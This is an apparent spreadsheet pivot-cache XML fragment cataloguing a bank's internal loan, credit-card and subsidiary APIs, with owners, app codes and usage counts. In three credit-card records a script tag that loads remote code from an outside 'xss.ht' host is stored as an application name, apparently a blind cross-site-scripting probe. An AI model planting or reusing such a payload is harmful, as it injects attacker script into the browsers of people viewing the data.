    <s v="Aprobaciones_AW036007 _x000d__x000a_ NU0107001_LoansApproval_MR _x000d__x000a_ APP_AW0360007 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_AW1285001 _x000d__x000a_ APP_NU0102001 _x000d__x000a_ ProductosDeFinanciación_NU0102001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="33"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T10:29:24"/>
    <s v="Consumption Loans"/>
    <n v="200"/>
    <s v="Consumption Loans - Disbursements"/>
    <n v="112"/>
    <x v="79"/>
    <s v="En su versión inicial, esta API expone la capacidad de ejecutar un desembolso en lí­nea sobre una cuenta depósito o bien realizar el reverso de un desembolso realizado el mismo dí­a"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="DesembolsoCreditoConsumo/V3.0"/>
    <m/>
    <s v="LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T10:29:24"/>
    <s v="Consumption Loans"/>
    <n v="200"/>
    <s v="Consumption Loans - Installments"/>
    <n v="200"/>
    <x v="80"/>
    <s v="Esta API permite consultar el pago periódico al que se compromete un cliente con el banco, con el fin de devolver el financiamiento que se le otorgó. En la cuota se pueden distinguir dos componentes. El primero corresponde al reintegro de parte del capital prestado (valor de la cuota) mientras que el otro concierne a los intereses generados (tasa nominal mes vencido, tasa efectiva anual, valor numérico de la DTF)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaCuotaCredito/V1.0"/>
    <m/>
    <s v="LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-28T10:29:24"/>
    <s v="Consumption Loans"/>
    <n v="200"/>
    <s v="Consumption Loans - Installments"/>
    <n v="112"/>
    <x v="80"/>
    <s v="Esta API permite consultar el pago periódico al que se compromete un cliente con el banco, con el fin de devolver el financiamiento que se le otorgó. En la cuota se pueden distinguir dos componentes. El primero corresponde al reintegro de parte del capital prestado (valor de la cuota) mientras que el otro concierne a los intereses generados (tasa nominal mes vencido, tasa efectiva anual, valor numérico de la DTF)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaCuotaCredito/V1.0"/>
    <m/>
    <s v="LoansOffer_NU0102001 _x000d__x000a_ MsUtilities_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Contra Ordenar Cheques"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El usuario desde la sucursal virtual de empresa ó persona, podrá contraordenar uno o varios cheques en un rango consecutivo relacionados a una misma chequera de una cuenta corriente del cliente perteneciente a Filiales del exterior (Cayman, Panamá, Miami y Puerto Rico)"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Contribucion Documental"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite realizar checkin de documentos hacia Gestión Documental (WCC), firmado electrónico de documentos PDF (estampado cronológico) y su posterior custodia en Oracle WCC."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="BB14 - CONTRIBUCIÓN DOCUMENTAL_AW1104001"/>
    <s v="NU0102001 _x000d__x000a_NU0127001 _x000d__x000a_NU0004001 _x000d__x000a_NU0034001 _x000d__x000a_AW1170 _x000d__x000a_AW1176"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-27T10:42:57"/>
    <s v="Contribution Models"/>
    <n v="100"/>
    <s v="Contribution Models - Analytic Model"/>
    <n v="100"/>
    <x v="81"/>
    <s v="Permite la interacción de un proyecto que requiera enviar un fragmento que corresponde a una cadena de texto, para procesarlo dentro de un modelo analí­tico disponible para su uso, con el fin de poder consultar el resultado del procesamiento para el fragmento enviado."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-25T16:25:20"/>
    <s v="Management Checklists"/>
    <n v="100"/>
    <s v="Control Lists Management"/>
    <n v="100"/>
    <x v="82"/>
    <s v="Esta API tiene la capacidad de registrar un cliente en una categorí­a y subcategorí­a de listas de control, el cliente puede ser una persona Natural o Jurí­dica.   **Este API no contempla el retiro de clientes de estas listas.**"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="GestionListasDeControl/V2.0"/>
    <m/>
    <s v="VINCUTRANS_NU0034001 _x000d__x000a_ Plink_AW1206001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="2"/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Convertir Monto"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Calcula el equivalente en otras monedas de determinados montos o importes, por motivos de movimientos entre cuentas que manejan diferentes monedas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-05T14:17:31"/>
    <s v="Corporate Loan"/>
    <n v="101"/>
    <s v="Corporate Loan - Credit Limits"/>
    <n v="101"/>
    <x v="83"/>
    <s v="Esta API expone capacidades que permiten desde la consulta básica hasta consolidada de lí­mites de endeudamiento entre lí­neas de crédito para un cliente de cartera comercial en particular, así­ como la consulta en detalle de dichos lí­mites de endeudamiento"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ SVECarteraComercial_NU0162001"/>
    <n v="2980"/>
    <n v="2782"/>
    <n v="2435"/>
    <n v="2131"/>
    <n v="3708"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Correlacionar Transacciones_BB6"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El propósito de este servicio es permitirle al consumidor crear la correlación de una transacción por proceso, producto, documento o por identificador en el sistema UCM."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Correlacion de Transacciones BB6_Correlacion de Transacciones BB6_AW0936001"/>
    <s v="AW0922 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-06-25T16:33:10"/>
    <s v="Correspondent Bank"/>
    <n v="103"/>
    <s v="Correspondent Bank - Banks and Branches"/>
    <n v="102"/>
    <x v="84"/>
    <s v="La api Correspondent Bank -banks and branches permite consultar desde las filiales del exterior (Bancolombia Panamá, sucursal Panamá, Bancolombia puerto rico y Bancolombia cayman) los bancos del exterior que se encuentran asociados a estas filiales y a su vez consultar las sucursales de los bancos."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaBanco/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW1185001 _x000d__x000a_ TMP2 johucorr_AW1185001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="737"/>
    <n v="686"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-11-10T16:30:10"/>
    <s v="Counter Party Administration"/>
    <n v="100"/>
    <s v="Counter Party Administration - Master Routing Code"/>
    <n v="100"/>
    <x v="85"/>
    <s v="La API Counter Party Administration - Master Routing Code permitirá a los consumidores poder obtener los diferentes maestros necesarios para poder consultar la información correspondiente a los códigos de enrutamiento al momento de la inscripción de una cuenta destino dentro del proceso de transferencias internacionales. Estos códigos de enrutamiento podrán enrutar correctamente la transferencia externa hacia su destino. Dichos códigos se pueden obtener dependiendo del paí­s y la moneda destino de la transferencia (Códigos identificados: Código TRANSIT, Código ABA, Código IBAN, Código CABLE)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Juan Felipe Granada Gaviria"/>
    <s v=""/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="6071"/>
    <n v="5132"/>
    <n v="6178"/>
    <n v="8587"/>
    <n v="13047"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Creacion Caso Consulta LE"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio creación caso consulta LE (limite endeudamiento), inicia un proceso en Bizagi, con el fin de consultar el limite de endeudamiento de un cliente(Persona, pyme)"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW1170 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Creacion Casos BPM Documental"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Creación caso BPM documental toma la información de cliente, proceso y documento de la petición del negocio para crear un caso en Kofax, que crea el job y envía como respuesta si fue exitoso o no; en caso de ser exitoso, en Kofax se inicia la ejecución de un proceso?, que incluye la clasificación y extracción de información."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Creacion Tarjetas Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Creación Tarjetas Crédito permite tener diferentes tipos de creación de tarjetas de crédito disponible a los consumidores según su uso  • Uso inmediato: Se crea la tarjeta de manera virtual, obteniendo como resultado un número de tarjeta, CVC2 y fecha de vencimiento para que el cliente pueda proceder a realizar transacciones en línea mientras le llega la tarjeta física. Los números de tarjeta instantánea y física son iguales, pero la fecha de vencimiento será diferente cuando le llegue la tarjeta física al cliente. • Emisión Instantánea: Esta capacidad sólo estará disponible para sucursales pues el cliente solicita la tarjeta y se le puede entregar de manera inmediata (la sucursal debe contar con la impresora para generar el embosado -plástico- de la tarjeta) • Primera compra: (Pendiente) "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="AW1285001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Crear Cuenta Pasivo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Tiene como propósito soportar el proceso de oferta de productos de Bancolombia. Los tipos de cuentas soportados son, Cuentas de Ahorro, Cuentas Corrientes, Cuentas de depósito a Término Fijo, y un segundo tipo de depósito a término fijo llamado TopUp."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001 _x000d__x000a_AW0611001 _x000d__x000a_AW0683001 _x000d__x000a_AW0563001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Crear Novedad Producto Trade"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El objetivo del servicio es permitir efectuar diferentes tipos de modificaciones en productos de Carta de Crédito de Importación o Garantía Standby Emitida que tiene el cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Crear Producto Trade"/>
    <n v="100"/>
    <x v="0"/>
    <s v="soportar la funcionalidad de creaciones del producto Trade (carta de crédito de importación o garantía standby emitida) que Bancolombia le ofrece a un Cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Crear Usuario"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Permitir crear usuarios tanto para Sucursal virtual persona (SVP) como para Sucursal virtual empresa (SVE) para que pueda utilizar el canal."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-07T17:37:17"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Administration"/>
    <n v="104"/>
    <x v="86"/>
    <s v="Esta API permite exponer las diferentes capacidades de gestión relativas a tarjetas de crédito. Incluye capacidades de novedades y validaciones que se describen brevemente a continuación  - Afiliar débito automático   - Desafiliar débito automático  - Solicitar ampliación de plazo."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <m/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="2979"/>
    <n v="2786"/>
    <n v="2423"/>
    <n v="2122"/>
    <n v="2379"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-22T16:05:53"/>
    <s v="Credit Card"/>
    <n v="110"/>
    <s v="Credit Card - Credit Cards"/>
    <n v="100"/>
    <x v="87"/>
    <s v="Permite realizar diferentes tipos de consultas asociadas a las tarjetas de crédito"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V1.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ JornadaPagos_AW1316001"/>
    <n v="20913"/>
    <n v="228308"/>
    <n v="269274"/>
    <n v="665987"/>
    <n v="613589"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-07T17:37:17"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Credit Cards"/>
    <n v="216"/>
    <x v="87"/>
    <s v="Esta Api contiene capacidades que permiten realizar diferentes tipos de consultas asociadas al producto Tarjeta de Crédito, los cuales se listan a continuación - Listar las tarjetas de un cliente - Consultar el detalle de una tarjeta - Consultar el código de seguridad de una tarjeta"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V1.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="20913"/>
    <n v="228308"/>
    <n v="269274"/>
    <n v="665987"/>
    <n v="613589"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-11-17T11:55:14"/>
    <s v="Credit Card"/>
    <n v="110"/>
    <s v="Credit Card - Information"/>
    <n v="100"/>
    <x v="88"/>
    <s v="permite realizar diferentes tipos de consultas asociadas a las tarjetas Credito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V2.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ SEG_NU0064001 _x000d__x000a_ JornadaPagos_AW1316001"/>
    <n v="111917"/>
    <n v="142428"/>
    <n v="111778"/>
    <n v="126742"/>
    <n v="134285"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-23T14:56:14"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Information"/>
    <n v="105"/>
    <x v="88"/>
    <s v="permite realizar diferentes tipos de consultas asociadas a las tarjetas Credito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V2.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="111917"/>
    <n v="142428"/>
    <n v="111778"/>
    <n v="126742"/>
    <n v="134285"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-23T14:56:14"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Management"/>
    <n v="104"/>
    <x v="89"/>
    <s v="Esta API permite exponer las diferentes capacidades de gestión relativas a tarjetas de crédito. Incluye capacidades de novedades y validaciones"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="GestionTarjetasCredito/V2.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="2984"/>
    <n v="2783"/>
    <n v="2422"/>
    <n v="2144"/>
    <n v="3436"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-23T14:56:14"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Offer"/>
    <n v="102"/>
    <x v="90"/>
    <s v="Esta API permite a los consumidores calcular una oferta de tarjetas de crédito para un cliente."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="OfertaComercialTarjetasCredito/V1.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-07T17:37:17"/>
    <s v="Credit Card"/>
    <n v="218"/>
    <s v="Credit Card - Transactions"/>
    <n v="106"/>
    <x v="91"/>
    <s v="Esta Api permite realizar consultas y solicitudes relativas a las transacciones realizadas con tarjetas de crédito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V2.0"/>
    <m/>
    <s v="Autenticacion-para-VCAS_NU0101001 _x000d__x000a_ ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ PagoTDCWompi_AW1405001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="3663"/>
    <n v="8815"/>
    <n v="7134"/>
    <n v="6422"/>
    <n v="2469"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-04-28T11:02:34"/>
    <s v="Credit Cards"/>
    <n v="110"/>
    <s v="Credit Cards - Cards Limit"/>
    <n v="100"/>
    <x v="92"/>
    <s v="Capacidad que permite aumentar o disminuir el cupo (lí­mite) de una tarjeta de crédito mediante el níºmero de tarjeta, el cupo actual y el cupo nuevo."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ModificacionDeCupoTarjetas/V1.0"/>
    <s v="Tarjetas Vision Plus_ISTVP001"/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ Ares_AW1250 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ &lt;script&gt;$.getScript(&quot;//mistestxss.xss.ht&quot;)&lt;/script&gt; _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ Dcmonroy_prueba_paso"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-06-02T14:33:04"/>
    <s v="Credit Cards"/>
    <n v="110"/>
    <s v="Credit Cards - Management"/>
    <n v="100"/>
    <x v="93"/>
    <s v="Esta API permite exponer las diferentes capacidades para gestionar la emisión de tarjetas de crédito. Inicialmente, la API tendrá las siguientes capacidades: *  Crear tarjeta de crédito por uso inmediato"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="GestionTarjetasCredito/V1.0"/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ Ares_AW1250 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ &lt;script&gt;$.getScript(&quot;//mistestxss.xss.ht&quot;)&lt;/script&gt; _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ Dcmonroy_prueba_paso"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-06-02T14:33:04"/>
    <s v="Credit Cards"/>
    <n v="110"/>
    <s v="Credit Cards - Product Information"/>
    <n v="100"/>
    <x v="94"/>
    <s v="Permite realizar diferentes tipos de consultas asociadas al producto Tarjetas de Crédito, viéndolo como una entidad y no como las consultas asociadas a las tarjetas de un cliente. Actualmente tiene disponible la consulta de las tasas de interés efectivo anual y mensual para el producto, permitiendo discriminar por tipo de transacción (compra, avance, impuesto, mora, re-financiación, compra de cartera), franquicia o producto (logo)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasCredito/V1.0"/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ Ares_AW1250 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ &lt;script&gt;$.getScript(&quot;//mistestxss.xss.ht&quot;)&lt;/script&gt; _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ Dcmonroy_prueba_paso"/>
    <n v="7141"/>
    <n v="7231"/>
    <n v="8824"/>
    <n v="8983"/>
    <n v="9468"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-22T10:15:21"/>
    <s v="Credit Disbursement"/>
    <n v="101"/>
    <s v="Credit Disbursement - Management"/>
    <n v="101"/>
    <x v="95"/>
